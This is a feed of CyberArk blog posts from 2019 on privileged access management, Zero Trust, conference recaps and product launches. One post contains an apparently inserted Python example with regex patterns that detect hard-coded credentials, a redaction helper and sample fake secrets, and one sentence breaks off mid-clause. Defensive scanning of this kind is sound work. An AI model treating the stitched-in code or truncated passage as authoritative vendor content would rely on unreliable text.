What we’re seeing is that there are vulnerabilities on the operational technology side that are not being addressed. Very often they can’t be addressed without modernizing or refreshing the backend technology. They’re not being refreshed or modernized because it costs a lot of money and, if the generation unit is working, companies don’t have any incentive to fix it. But, the “if it ain’t broke don’t fix it” mindset doesn’t apply when it comes to national security and supporting a more resilient national security posture.

What can we do here and now to affect policy in a positive way?

The problem we have is that, while we can highlight the cybersecurity problem to the utility and the utility may even agree that it’s a problem, without regulation motivating them to fix it, they aren’t necessarily going to fix it in a timely manner without some kind of incentive. So, I do feel that CyberArk has a responsibility to both shine a light on the industry to show what needs to be improved and to work with key stakeholders to influence an environment that allows and empowers organizations to solve the problem.

What role do you see CyberArk having in this going forward?

I think we should find ways to be more involved in national, if not international-level initiatives, whether that’s through something like CompTIA or being part of the Identity Defined Security Alliance (IDSA) or something like Cyber Threat Alliance. I think we have a responsibility as a leading company in the cybersecurity space to use our position and our voice to highlight areas that need more attention and prioritization.

What issue in cybersecurity do you most want to advocate for?

I don’t think we talk about cybersecurity in the schools enough. We barely talk about programming at the schools, never mind cultivating the next generation of cybersecurity-aware students and future professionals. Cybersecurity is interesting, cool stuff and I think we should expose more kids to what we do.

I just don’t think people even think about cybersecurity as an alternative career path, because we’re not in the elementary schools, the middle school and the high schools talking about what cybersecurity is. In their minds, cybersecurity is something that just gets in the way of their day-to-day activities with their phone, laptop or iPad. But, it’s so much more than that. I don’t think we bring it home in a consumable way for a broader set of people to help them really get it. That’s something I’d like to help change and advocate for.

]]>
Zero Trust Part I: The Evolution of Perimeter Security   https://www.cyberark.com/blog/zero-trust-part-i-the-evolution-of-perimeter-security/ Tue, 12 Mar 2019 13:32:14 +0000 https://www.cyberark.com/?p=38054 Zero Trust

A Brief History of the Zero Trust Model

Established back in 2010 by industry analyst John Kindervag, the “Zero Trust model” is centered on the belief that an organization should not automatically trust anything inside or outside its perimeter; instead, it must verify anything and everything trying to connect to its systems before granting access. To quote a line often attributed to Joseph Stalin, “I trust no one, not even myself.” Essentially, the same rule applies to this concept.

In the wake of the U.S. Office of Personnel Management (OPM) breach, the House of Representatives strongly recommended government agencies adopt a Zero Trust framework to protect their most sensitive networks from similar attacks. Market research shows Zero Trust models, and the technologies that support them, are becoming more mainstream and readily adopted by enterprise-level organizations worldwide. When organizations like Google create and implement their own flavor of Zero Trust, BeyondCorp, people start to pay attention.

This two-part blog will first focus on how perimeter security has changed over time and how the importance of securing privileged access has increased in line with this change. The second installment will highlight five critical considerations for modern architectures.

The (D)evolution of the Perimeter

In the beginning, maintaining a high level of protection from cyber threats was very much focused on securing the perimeter. This was the golden age of firewalls, VPNs and DMZs (Figure 1). Trust was, essentially, established and defined by the perimeter. At this point in time, the lifeblood of the company existed almost exclusively within the physical walls of the organization. The belief was that if you’re connected to the network, then you are trusted, and if you’re an employee of the company, then you can’t go rogue. In these early days, organizations focused on perimeter security to prevent things like network intrusion, malware, phishing, denial of service and zero-day attacks. This is all well and good, but this traditional “Tootsie Pop” model (remember those commercials?) featured a strong exterior where the focus was placed almost exclusively on the perceived threat from the outside, and completely ignored the soft, chocolaty goodness directly in the middle.

Figure 1. The golden age of the firewall, when users, applications, data and Tier 0 assets all resided within the physical walls of the organization.


Over time, we ultimately punctured this traditional security bubble – effectively bringing the problems inside, which meant redefining our sense of trust and appropriate controls. First, users transformed into digital nomads, abandoning their corporate or branch locations to become fully remote employees. We then opened up our networks to consumers so that they could use our applications, leading to extranets and moving another layer of the concentric circles in Figure 1 to the outside. For example, with VPN connections, organizations often allow half of the traffic to go directly outside and half through the VPN to access the organization’s applications. This VPN connection inherently trusts the user’s machine and, by connecting to those machines, potentially subjects itself to malware, which can then spread itself through the network.

Next, the adoption of SaaS applications took hold as businesses looked to scale their applications across multiple end user PCs, without filling up too much of the (at the time) expensive hardware and storage space.

Naturally, we then find our data and workloads moving to the cloud. Our files, documents and emails are on Office 365, and our usage of public data sources (and of SaaS) increases. Lastly, infrastructure extends to hybrid architectures via Amazon Web Services (AWS), Microsoft Azure and Google Cloud Platform, which is how many organizations are architected today (Figure 2).

Figure 2. The perimeter transitions into a more fluid and dynamic state, with users, applications, data and Tier 0 assets moving within and outside of the traditional model.

Throughout this evolutionary process, the perimeter had become so fluid and dynamic in nature that the boundaries, in the traditional sense, ultimately disappeared. The perimeter is no longer a static entity; it’s been made permeable by the disruption of things like cloud, digital transformation, the Internet of Things (IoT), mobile access and an increasingly geo-distributed workforce.

Within these modernized architectures and with an expanded attack surface, the privileged access pathway creates significantly more risk (Figure 3). Let’s differentiate the two access pathways: the standard user ultimately has very basic, low-level access limited to just the application layer; the privileged user, essentially, has unfettered access to the application layer, sensitive data and the mission-critical Tier 0 assets. This inherently carries a much higher level of risk if left unmanaged and unsecured, given the decentralized nature of this model.

Zero Trust applies not only to human users but to non-human users as well, e.g. applications interacting with operating systems via service accounts, and business (and robotic) automation processes where software bots are connecting to, storing and accessing sensitive data and applications. As the security layers slip through the fingers of the organization, securing important data becomes a much bigger challenge.

Figure 3. An example of the standard and privileged access pathways in a modernized architecture.

Let’s highlight a standardized workflow for the privileged user. Let’s assume a privileged user is working abroad while on a business trip and he or she is trying to configure and run a cloud service hosted in an AWS instance, which requires pulling a database running on a Unix box racked in an existing mainframe. Ensuring that there’s a consistent point of trust throughout this workflow is a challenge that needs to be addressed; the user remotely connects to different islands of systems, databases and applications (both on-premises and in the cloud) creating many potential points of entry for an attacker.

This evolution of the security model not only aligns with the principles on which Zero Trust was established, it reaffirms the importance of securing privileged access. The foundation of Zero Trust is, arguably, the same as the foundation for why CyberArk and the privileged access management space exist. Now, while most enterprises may not be willing to fully abandon firewalls and perimeter security, they certainly should be placing their focus on tightening security from the inside to mitigate the risk of an advanced attack.

In the next installment, we discuss the evolution of trust and make recommendations for building out modern architectures that align to Zero Trust frameworks.

To learn more, watch the Implementing Privileged Access Security into Zero Trust Models and Architectures webinar.

Continue reading in part 2.

RSA Conference 2019 — That’s a Wrap! https://www.cyberark.com/blog/rsa-conference-thats-a-wrap/ Fri, 08 Mar 2019 15:30:04 +0000 https://www.cyberark.com/?p=37942

We’re home from the RSA Conference 2019. We came together with peers, partners and customers from around the world to tackle the greatest cybersecurity challenges of today. The 28th annual event’s theme was simply, better.

This means working hard to find better solutions. Making better connections with peers from around the world. Keeping the digital world safe so everyone can get on with making the real world a better place. Because security truly is a team game.

At the conference, CyberArk’s industry contributions were recognized at the SC Awards Gala, where the CyberArk Privileged Access Security Solution was named the SC Awards 2019 winner for Best Enterprise Security Solution. Widely considered the gold standard of excellence in cybersecurity, the SC Award recognizes CyberArk’s market leadership, its role in strengthening the IT security industry’s continued evolution and its dedication to helping organizations reduce cyber risk and accelerate their digital transformation journeys with confidence. We are honored to be recognized by the SC Awards for our commitment to innovation and product excellence.

At RSA Conference 2019, CyberArk was also named the Cyber Defense InfoSec Awards Market Leader for Privileged Account Management. According to Cyber Defense Magazine, which gives out the awards, Cyber Defense InfoSec Awards go to “hottest, most innovative, best, market leaders, next-generation and cutting edge INFOSEC companies.” CyberArk is proud to be counted among their number.

While at the conference, CyberArk announced the launch of the CyberArk Privileged Access Security Solution v10.8, the industry’s first privileged access security solution for continuous discovery and protection in the cloud, featuring ground-breaking new capabilities that mitigate the risk of privileged AWS account exploitation and deliver just-in-time, flexible user access across hybrid environments. CRN spotlighted it as one of the hottest product announcements at the show.

Nimrod Stoler, a researcher at CyberArk Labs – CyberArk’s white hat research team – presented original, in-depth CyberArk Labs research, “Highlighting Security Blind Spots in the DevOps Butler,” into vulnerabilities in the Jenkins automation server. The research found security issues such as credential exposure, agent launch vulnerabilities, AD integration issues and more – demonstrating that the DevOps environment may not be as secure as you think. Stoler offered his audience a solution: the zero-trust model.

In conjunction with Stoler’s speech, CyberArk Labs published new research during RSA showing how cyber-attackers can manipulate container defense-in-depth strategies to gain access to an organization’s most valuable assets. This report is part of CyberArk Labs’ industry-leading research examining how cyber-attackers can utilize existing vulnerabilities to circumvent container security and take advantage of DevOps environments. ThreatPost kicked off its RSA Conference 2019 coverage with an in-depth article on the new findings. For additional, related research read How I Hacked Play-with-Docker and Remotely Ran Code on the Host and Securing Kubernetes Clusters by Eliminating Risky Permissions.

As we think back on our time at RSA Conference 2019, it’s clear to us after numerous conversations, demos and meetings over the past two days on the show floor that organizations are committed to prioritizing and protecting privileged access – to making their cybersecurity better. Whether you’re just getting started with a privileged access management program or are focused on implementing advanced strategies to align with transformative new technologies, we are here to help.

Announcing CyberArk Application Access Manager — Secrets Management for Applications, Tools, Containers and DevOps https://www.cyberark.com/blog/announcing-cyberark-application-access-manager-secrets-management-for-applications-tools-containers-and-devops/ Mon, 04 Mar 2019 14:00:34 +0000 https://www.cyberark.com/?p=37451

We’re excited to announce the availability of CyberArk Application Access Manager, which combines CyberArk Application Identity Manager and Conjur Enterprise into a unified, powerful offering providing secrets management for applications, third party tools, containers and DevOps environments.

Application Access Manager helps organizations control, manage and audit non-human privileged access for a wide range of applications across on-premises, hybrid and cloud environments. Protecting credentials for applications and other non-human identities is critical for organizations. Non-human credentials are ubiquitous. Unfortunately, hard-coded credentials are too often embedded in many different types of applications, including commercial off-the-shelf solutions, internally developed business-critical applications and the CI/CD tool chain.

These credentials need to be managed because they enable access to protected data and other applications, leverage cloud resources and services, and have the ability to scale and execute business processes instantly. This is great when you control the credentials, but it can rapidly become a massive problem when an attacker has them. Fortunately, the same security principles that protect human credentials also apply to non-human credentials: least privilege, role-based access controls, credential rotation, management and audit can all be applied to them. However, because of higher performance and scale requirements, the special technologies required to strongly authenticate applications or code, and other factors, protecting non-human credentials requires its own solution.
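To make the hard-coded-credential problem and its remediation concrete, here is an added example written for this page (not CyberArk, Conjur or Application Access Manager code). The first half is a small scanner that flags embedded credentials in source lines, the kind of check a CI job can run before code is merged; the second half shows the runtime-fetch pattern the paragraph recommends, where the application identity reads a named secret from a provider instead of carrying it in code. The `SecretProvider` class, the secret name `prod/db/app_svc` and the sample source lines are constructed for this example; the AWS key in the sample is the documented AWS placeholder, not a live key.

```python
"""Added example: detect hard-coded credentials in source and show the
runtime-fetch alternative. Not CyberArk's code; all names are constructed."""
import re
from typing import Callable, Iterable, List, Optional, Tuple

# Rules for common embedded-credential shapes. Constructed for this example;
# a production scanner would carry a wider, tuned rule set.
CREDENTIAL_PATTERNS = [
    # AWS access key IDs have a fixed prefix and length.
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    # NAME = "literal" where NAME looks like a credential and the literal is non-trivial.
    ("generic_assignment", re.compile(
        r"(?i)(password|passwd|pwd|secret|api[_-]?key|token)\s*[:=]\s*['\"][^'\"]{8,}['\"]")),
    # PEM private key material pasted into a file.
    ("private_key_block", re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----")),
]


def redact(value: str) -> str:
    """Keep only the first and last four characters so a finding never leaks the secret."""
    if len(value) <= 8:
        return "*" * len(value)
    return value[:4] + "*" * (len(value) - 8) + value[-4:]


def find_hardcoded_credentials(lines: Iterable[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, rule_name, redacted_match) for each line that trips a rule."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        for rule, pattern in CREDENTIAL_PATTERNS:
            match = pattern.search(line)
            if match:
                findings.append((line_no, rule, redact(match.group(0))))
                break  # one finding per line is enough for a gate
    return findings


class SecretProvider:
    """Minimal stand-in for a secrets-manager client (constructed assumption).

    The lookup callable is whatever your real client exposes; the point is that
    the application asks for a secret by name at runtime and never stores it.
    """

    def __init__(self, lookup: Callable[[str], Optional[str]]):
        self._lookup = lookup

    def get(self, name: str) -> str:
        value = self._lookup(name)
        if not value:
            # Least privilege: this identity was not granted this secret, so fail closed.
            raise RuntimeError(f"secret {name!r} not available to this identity")
        return value


def connect_db_hardened(provider: SecretProvider) -> dict:
    """The 'after' shape: credentials come from the provider, so rotation happens
    there and the code never changes when the password does."""
    return {"user": "app_svc", "password": provider.get("prod/db/app_svc")}


# Constructed sample source: two embedded credentials and one correct runtime read.
SAMPLE_SOURCE = """\
import psycopg2
DB_PASSWORD = "Sup3rS3cretPassw0rd!"   # constructed sample: hard-coded credential
AWS_KEY = "AKIAIOSFODNN7EXAMPLE"       # AWS documentation example key, not a live key
conn = psycopg2.connect(user="app_svc", password=DB_PASSWORD)
api_key = os.environ.get("API_KEY")   # fine: value is read at runtime, not embedded
""".splitlines()


if __name__ == "__main__":
    for line_no, rule, shown in find_hardcoded_credentials(SAMPLE_SOURCE):
        print(f"line {line_no}: {rule}: {shown}")
    # Hardened path: the provider here is an in-memory dict standing in for a real vault.
    provider = SecretProvider({"prod/db/app_svc": "rotated-by-the-vault"}.get)
    print(connect_db_hardened(provider)["user"])
```

In a pipeline, `find_hardcoded_credentials` would run over every changed file and fail the build on any finding; the redacted output is safe to post in a build log. The `SecretProvider` failing closed when a secret is not granted is deliberate: an application that silently falls back to an embedded default recreates the problem the scanner was meant to remove.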

Part of the CyberArk Privileged Access Security Solution, Application Access Manager provides privileged access and credential and secrets management for a wide variety of application types, including:

  • Commercial off-the-shelf solutions: Provides and manages credentials for third-party tools and solutions including security and IT operations tools, RPA (Robotic Process Automation) and other automation, as well as configuration management and orchestration tools.
  • Internally-developed traditional applications: Protects business-system data and simplifies operations by eliminating hard-coded credentials from applications and scripts developed internally by the organization.
  • Cloud-native applications built using DevOps methodologies: Meets the dynamic needs of DevOps and cloud-native environments to manage secrets and credentials used by non-human entities – including CI/CD toolchains, containerized applications and PaaS environments.

Application Access Manager includes all the functionality that was previously available in Application Identity Manager and the enterprise version of Conjur. This powerful functionality helps organizations:

  • Control and manage privileged access for non-human identities: Secures applications and other non-human identities across on-premises, hybrid, containerized and multi-cloud environments.
  • Establish strong authentication: Leverages the native attributes of applications, containers and other non-human identities to eliminate “secret zero bootstrapping.”
  • Simplify integrations: Supports integrations with a variety of commercial software platforms, applications and tools – including business applications, security tools, RPA platforms, CI/CD toolsets and container platforms.
  • Accelerate deployment and usage: Allows developers to focus their attention on developing software by making securing application secrets simple and easy. Additionally, the open source version on conjur.org makes it easy for developers to start securing their CI/CD pipeline and applications in development.

The solution meets other critical enterprise requirements, including ensuring a comprehensive tamper-resistant audit and consistently applied access policies, as well as meeting scalability and availability requirements. For additional details refer to the new Application Access Manager Data Sheet.

The new Application Access Manager is designed to make the purchasing and deployment process easier for customers. It makes licensing simpler by making it easier for customers to select the licensing option that is best for them. For example, it enables customers on their digital transformation journey to flexibly allocate licenses between on-premises environments and dynamic containerized deployments in the cloud.

This flexibility is already proving popular with customers as they make their digital journey, confident that they can count on CyberArk to help them consistently manage credentials for human users, applications and other non-human identities – to help reduce the attack surface and stay safe.

Interested in learning more? Visit the new Application Access Manager Product page and DevOps Solution page on cyberark.com, and download the new Application Access Manager datasheet. Conjur Open Source will continue to offer a feature-rich solution for developers and is available at conjur.org.

Stop by and see us at RSA Conference booth #6253 North!

Government Organizations: Address Cloud Security and Compliance with the CyberArk Privileged Access Security Solution for AWS GovCloud (US) https://www.cyberark.com/blog/government-organizations-address-cloud-security-and-compliance-with-the-cyberark-privileged-access-security-solution-for-aws-govcloud-us/ Thu, 28 Feb 2019 14:45:25 +0000 https://www.cyberark.com/?p=37238

When government agencies, organizations in government-regulated industries or private entities want to take advantage of the cloud, they turn to AWS GovCloud (US), an isolated region within the AWS cloud that hosts sensitive data, regulated workloads and addresses relevant security and federal compliance requirements.

AWS GovCloud brings the agility and scalability benefits of the AWS cloud platform to US-based customers with the most stringent regulatory and compliance requirements. And now, based on customer demand, the CyberArk Privileged Access Security Solution supports and runs on AWS GovCloud.

The CyberArk solution enables organizations running on AWS GovCloud to dramatically simplify and automate privileged access protection for sensitive cloud-based systems and applications while strengthening compliance and accelerating digital transformation initiatives. The solution also enables organizations to consistently enforce privileged access management policies across cloud, on-premises and hybrid environments.

With CyberArk, AWS GovCloud (US) customers can:

Discover and onboard

  • Automatically and continually discover privileged accounts and credentials, including cloud console access, AWS IAM and EC2 account passwords, SSH keys and API keys, across on-premises, cloud or hybrid environments
  • Reduce risk from cyber-attacks and meet compliance requirements
  • Accelerate onboarding of unmanaged accounts based on risk

Monitor

  • Suspend or terminate privileged sessions automatically based on risk score and activity across environments, including AWS instances
  • Minimize end user impact with granular level controls
  • Integrate with SOC tools and prioritize alerts based on risk score

Record

  • Reduce time spent on audit review with the ability to start viewing logs at the point risky activity began
  • Risk-based review and response through risk level classification

The CyberArk Privileged Access Security Solution is strongly positioned to help organizations meet today’s challenging security and compliance requirements. The solution is on the US Department of Defense (DoD) Unified Capabilities Approved Products List (UC APL). Like AWS GovCloud, the CyberArk solution is compliant with Federal Information Security Management Act (FISMA) and Health Insurance Portability and Accountability Act (HIPAA) privacy standards.

The CyberArk solution for AWS GovCloud is available now to qualified, US-based customers through a SaaS subscription model. To learn more, visit the AWS Marketplace.

To learn more about CyberArk’s comprehensive cloud security offerings, visit https://www.cyberark.com/cloud.

7 Ways CyberArk Simplifies Deployment, Integration and Scaling of Privileged Access Management https://www.cyberark.com/blog/7-ways-cyberark-simplifies-deployment-integration-and-scaling-of-cybersecurity-controls/ Tue, 26 Feb 2019 14:30:53 +0000 https://www.cyberark.com/?p=36959

CyberArk aims to make implementing and managing a robust privileged access program as easy as possible for our customers. CyberArk continues to lead the industry with its own investments in innovation to consistently deliver the most value to customers – especially in terms of simplicity, automation and improved operational efficiencies. Over the course of the last calendar year alone, CyberArk introduced dozens of new capabilities to help customers more easily implement and scale their privileged access management controls. Here’s a list of our top seven updates to the Core CyberArk Privileged Access Security solution:

  1. Privileged Session Management for the Cloud – In March of last year, CyberArk acquired cloud security provider Vaultive and rolled the functionality into the CyberArk Privileged Access Security Solution. This provides organizations with greater visibility and control over privileged business users, social media, SaaS, IaaS and PaaS administrators, and enables customers to manage privileged sessions natively. This introduces yet another method for CyberArk customers to isolate and monitor sessions for web-based applications. These sessions are automatically assigned a risk score, much like any other privileged session in CyberArk, which helps SOC admins take a risk-based approach to securing their most critical assets. Accounts for cloud providers (AWS, Azure, Google Cloud Platform), social media (Twitter, Facebook, LinkedIn) and other web applications like Salesforce and OpenShift can now be secured while providing a native login experience to the admins and privileged business users of these critical applications.
  2. Integrated threat detection and response – Threat detection, alerts and responses generated by the CyberArk Privileged Access Security Solution are now 100% integrated into the main console and also sent as logs directly to your SIEM tool or other alerting system. CyberArk administrators now have access to in-depth analytics on who or what is utilizing privileged access in the environment, and can see this information without having to look up from where they set policies, review sessions or log in to do their other administrative tasks. Not only that, but they are also able to receive prioritized alerts and initiate automated action to take a risk-based approach to privileged access management, tackling the riskiest accounts, credentials and activities first and thus reducing clutter and excessive alerts.
  3. Automatic Risky Session Termination – CyberArk provides security teams with the tools they need to automatically suspend or terminate risky privileged sessions based on policy, from the web-based interface or via API. The new tools enable security operations teams to mitigate risk by automatically shutting down or suspending sessions that pose a security risk until verified, rather than waiting for a human to identify the problem and act.
  4. PowerShell Utility for Un-Suspending Users – When a suspended user needs to be granted re-entry to CyberArk, instead of losing time relying on manual intervention to let the user back in, a member of our Customer Success Team, Randy Brown, came up with a clever way to use a PowerShell utility to revive suspended accounts. We’ve made this time-saver available free on GitHub, and it is one of many useful tools made available to our customers there.
  5. Automatic Account On-Boarding – Combing through all the privileged accounts that are discovered and onboarding them en masse into the vault can be time consuming. It can also present a security risk when end users create backdoor access to perform their own tasks. With CyberArk’s recent introduction of automatic account onboarding, neither of these things is an issue anymore. Automatic account onboarding helps administrators scale their privileged controls with reduced human intervention and increased speed to manage privileged accounts that present risk to your organization.
  6. Privileged Access Security Installer – When CyberArk released version 10.4, it included the Privileged Access Security Installer, which delivers a massive reduction in the steps required to deploy all of the CyberArk Core Privileged Access Security components. This is part of a concerted effort to support smaller deployments that deploy all CyberArk components on a single server.
  7. CyberArk Marketplace – Since the launch of the CyberArk Marketplace in 2018, CyberArk has expanded the depth and breadth of ready-to-deploy integrations – especially in key areas like IT Management and security software, Industrial Control Systems, Robotic Process Automation and Identity Access Management. Customers who use the CyberArk Marketplace can easily find and deploy integrations from CyberArk’s 100+ certified technical partners to bolster their security posture.

What’s Next?

Right now, cybersecurity professionals are having to do more with less. Having solutions, tools and features in place to help security teams effectively and efficiently use the products in their purview is more essential than ever. We recently hosted a webinar that outlines, and demonstrates new capabilities introduced in version 10 that help customers deploy, integrate and scale with CyberArk. Click here to access the recording and learn more!

Who’s Afraid of Security Headlines? Stay Safe with Proven Privileged Access Management https://www.cyberark.com/blog/whos-afraid-of-security-headlines-stay-safe-with-proven-privileged-access-security/ Thu, 21 Feb 2019 14:30:35 +0000 https://www.cyberark.com/?p=36136

Daily morning headlines from Dark Reading, Krebs on Security, ThreatPost and others remind us that breaches are inevitable – they are not a matter of “if,” but instead, “when.” This is increasingly understood, so one wonders if this reality leads people to make overly rash decisions based on what they read with their morning cuppa joe?

Catch that last question? Let’s talk about recency bias – the tendency to place too much weight on recent events.

While many IT practitioners, especially those in security, believe that we are perfectly astute and calculated bastions of logical decision-making, we are all, indeed, human. And agencies and news publications alike have capitalized on fear mongering, knowing that we cannot avoid consuming and commenting on the latest event driving headlines. Now, while there is little danger in your Kardashian obsession (Mine lately has been Jho Low, the embattled billionaire accused of swindling billions from the Malaysian government), there is potential danger in basing security purchases and strategies purely on the latest security fad.

New tools and technologies constantly enter the security market. Some vendors, often founded by security practitioners, are deploying powerful systems absolutely bursting with functionality, intelligence and potential. However, while the wildly innovative and nascent tools are interesting, security leaders have to provide the most security value they can – increasingly in terms of quantifiable risk reduction – across their entire organization.

What I suggest is, instead of chasing headlines, to adopt technologies that have gained recognition from security thought leaders and influencers for their ability to reduce risk and improve a company’s security posture. One place to look for direction is the Center for Internet Security (CIS), which provides a list of top security controls. This includes what they call “controlled use of administrative privileges” and we call privileged access management. Privileged access exists everywhere in your organization and has existed as long as administrator and superuser accounts have been integral to the operation of applications and infrastructure. Although it seems obvious that protecting privileged access is critical to maintaining security, it was, at one time, viewed as a niche security tool or something organizations could do as an “extra” step to securing the enterprise… a “nice to have,” if you will.

If you look into key regulations, across myriad industries, you will find that protecting privileged access is one of the key tenets to adhere to when the auditors come knocking. PCI-DSS 3.2, Sarbanes-Oxley, HIPAA and NERC CIP all require the protection and monitoring of privileged users and sessions. That being said, embarking on a privileged access management program isn’t just about checking the box to fulfill a compliance requirement but a key step in staying one step ahead of the attackers.

Many of us work in high tech because there is constant innovation and cutting edge solutions that push the limits of computing.

Technophiles should not fear as there are privileged access management companies like CyberArk experimenting with bleeding-edge tools, developing brand new technologies and implementing techniques to stay ahead of the attackers. For those interested in innovative techniques and deep privileged access management research, check out the CyberArk Threat Research Blog – and remember, news publications are fighting to be the most sensational and generate the most clicks. Trust your instincts and deploy proven privileged access controls instead.

New DevOps eBook: Managing Application Secrets – What Do Developers Really Want? https://www.cyberark.com/blog/new-ebook-managing-application-secrets-what-do-developers-really-want/ Tue, 19 Feb 2019 14:30:39 +0000 https://www.cyberark.com/?p=36668

There’s no doubt that DevOps methodologies offer significant strategic and competitive advantages. But, these benefits are not without risk. With faster code delivery at scale, the attack surface can grow rapidly with exponentially more secrets to manage and secure.

Importantly, while security teams set policies, it is the developers who are on the front lines coding, testing and building the applications – and actually securing the secrets. To find out more about how developers go about managing secrets in the applications they are developing for large enterprises, we commissioned an independent survey of DevOps managers and developers.

The survey’s findings are presented in our latest eBook, “Managing Application Secrets – What Do Developers Really Want?” The following provides a brief overview of some key takeaways. For a deeper look into how developers approach secrets management and the challenges enterprises face in securing secrets, their future plans and potential roadblocks, download the eBook here.

Built-in secrets management isn’t enough. Consider this: An organization utilizes Docker, Puppet, AWS, Kubernetes, Ansible and Azure. All of these DevOps tools and platforms offer some built-in secrets management capabilities, but the tools are not compatible with each other. Each tool takes a different approach to security and uses a different API, making the developer’s job more difficult. As requirements change and new tools are introduced, developers will likely need to address the challenges of integrating tools and managing and sharing secrets across these disparate systems.

Ownership confusion abounds. While developers can play a key role in selecting secrets management platforms, the platforms are often purchased by various teams and at multiple organizational levels with no single group “owning” decision-making and budgeting. This haphazard approach means different teams turn to different tools and services, creating layers of unnecessary complexity and questions about who is responsible for what, while laying the groundwork for future security issues. CyberArk discovered that less than half (41 percent) of security and DevOps teams are integrated throughout the whole application development process.

Standardization is key – but organizations face roadblocks. The vast majority – nearly 80 percent – of respondents indicate that it was important or very important to standardize on secrets management tools. Further, 60 percent consider it important or very important to have a privileged access or identity management vendor that also provides secrets management for their DevOps and CI/CD pipeline. This indicates that respondents recognize the importance of consistently securing credentials for both human users as well as applications and other non-human users. (This is important as it is human users who typically, initially assign privileged access to non-human users.) However, it’s not happening widely as only 24 percent of respondents said that they are currently using a standardized tool.

So while it’s clear that secrets management tools should be coordinated and integrated with enterprise-wide, privileged access management solutions – why have so few standardized? Our research points to budget constraints, still-evolving secrets management solutions, security teams that don’t adequately understand DevOps and fragmented decision processes as the biggest roadblocks to standardization today. The eBook looks at how these roadblocks can be addressed.

The new eBook provides the developer’s perspective on securing DevOps environments. (At the end of the day, what developers really want is the freedom to keep innovating and delivering high-value products without slowing down.) The eBook complements the recently published CISO View report, which provides the security leader’s perspective on securing DevOps environments. The eBook highlights four actionable and immediate steps DevOps and security teams can take to start making applications more secure. Both The CISO View and the Managing Application Secrets eBook are based on research conducted by independent research firms and are product agnostic.

To learn more about CyberArk’s solutions for securing DevOps environments, visit cyberark.com/devops. CyberArk offers the industry’s only platform-independent secrets management solution specifically architected to protect containerized and cloud-native applications across the CI/CD pipeline. A feature-rich open source solution, Conjur Open Source, provides easy access to developers and is available for download at conjur.org, as well as GitHub, AWS Marketplace and GCP.

On Tuesday, February 26th, CyberArk will present the webinar “How CISOs at Leading Global Organizations Secure their DevOps Environments.” The webinar will cover the recently released CISO View report and provide practical guidance on DevOps security based on insights from CISOs at Global 1000 companies and other experts. Click here to register for the webinar.

Champions of Health and Cybersecurity Unite at HIMSS 2019 https://www.cyberark.com/blog/champions-of-health-and-cybersecurity-unite-at-himss-2019/ Tue, 12 Feb 2019 20:12:29 +0000 https://www.cyberark.com/?p=36623

Today is the first full day of HIMSS 2019 – the world’s largest health information and technology conference – and we’ve just arrived in sunny Orlando, Florida, joining more than 45,000 healthcare professionals from across 90+ countries. This year, HIMSS is emphasizing cyber security and privacy – and we’re here to help.

Healthcare providers on the frontlines are rapidly turning to new models of care to offer advanced patient services and improve clinical outcomes. This year’s conference will explore a range of topics and technologies driving this evolution such as clinical informatics, digital health, interoperability, technology consumerization and personalized healthcare. Yet, as healthcare delivery networks expand in size and sophistication, they are also generating huge amounts of sensitive patient data or electronic personal health information (ePHI) – a key target for cyber attackers.

According to the 2018 End-of-Year Data Breach Report from the Identity Theft Resource Center, the healthcare sector had the second largest number of breaches last year, exposing nearly 10 million patient records (double the number from 2017). Additionally, the report found that healthcare databases had the highest rate of exposure per breach. Furthermore, according to Larry Ponemon, founder of the Ponemon Institute, a single stolen medical record is estimated to be worth

Protect Your Modern Healthcare Investments with CyberArk

Today’s healthcare providers require strong privileged access management to secure access to ePHI within expanding, interoperable care delivery networks, while protecting against persistent threats such as ransomware.

At HIMSS, we’ll demonstrate how the industry-leading CyberArk Privileged Access Security Solution supports your ability to protect ePHI, enable your IT team, simplify compliance and protect your investments – while easily accommodating innovation and expansion to safeguard your position as a leading provider of quality care. We invite you to connect with us at the show by:

  • Visiting CyberArk at the HIMSS Cybersecurity Command Center Booth #400 Kiosk #88. Engage in interactive, hands-on demos and discussions to enhance your knowledge on today’s hottest cyber security issues. Come see why seven of the top 10 hospital systems in the U.S. rely on CyberArk to mitigate the risks of privileged access and help them adopt transformative technologies with confidence.
  • Attending our presentation, “On the Front Lines of Managing Privileged Access.” Join us on February 12 at 4:45 p.m. in Cybersecurity Command Center Theater 2 to explore common attack methods for accessing coveted healthcare data and how strong privileged access management (or the lack thereof) can make or break a healthcare organization’s ability to demonstrate regulatory compliance and avoid financial penalties. We’ll also outline a proven, risk-prioritized approach for establishing essential privileged access controls to help quickly strengthen your security posture.

Interested in learning more? Check out these free resources to help jump-start your privileged access management program.

Congratulations to CyberArk’s Scott Whitehouse on Being Named a CRN Channel Chief Four Years Running! https://www.cyberark.com/blog/congratulations-to-cyberarks-scott-whitehouse-on-being-named-a-crn-channel-chief-four-years-running/ Mon, 11 Feb 2019 17:10:39 +0000 https://www.cyberark.com/?p=36581

As enterprises increasingly adopt new technologies – from cloud and DevOps to IoT and robotic process automation – their security and compliance challenges multiply. That’s why we’ve built a powerful, vibrant community of partners who share our belief that security is a team game and our commitment to helping customers around the world protect privileged access, address advanced cyber threats and accelerate digital transformation strategies. 

Leading the charge on our go-to-market strategies for innovative, integrated solutions; deep, vibrant partner ecosystem; and wealth of available partner resources is Scott Whitehouse, vice president of channels and alliances. 

Today, we’re thrilled to announce that Scott has been named a CRN Channel Chief for the fourth consecutive year! He’s recognized among the best of the best leaders who build, support and deliver superior partner programs and strategy. 

Scott continues to build strong channel relationships and deliver differentiated, award-winning solutions to the channel. Here are just a few of his recent accomplishments:  

  • Spearheaded the launch of our expanded multi-tenant, pay-as-you-go MSSP offering, which provides partners with greater flexibility and the ability to easily add privileged access management capabilities to their portfolios so they can expand market opportunities and create new revenue streams. 
  • Led the expansion of CyberArk’s partner ecosystem and grew strategic partnerships with a variety of firms, including PwC, Optiv, Deloitte and KPMG. 
  • Established new channel opportunities for cloud and DevOps through increased channel awareness of CyberArk capabilities enabling partners to protect against advanced security threats across dynamic environments.

Scott also played an instrumental role in launching the CyberArk Marketplace, and creating exciting opportunities through new and expanded integrations with C3 Alliance technology partners such as AWS, Red Hat, SAP, SailPoint, Okta and more. 

Please join us in congratulating Scott – a true leader who knows how to create and drive a partner program that delivers! 

To learn more about the CyberArk global partner ecosystem, visit us here. 

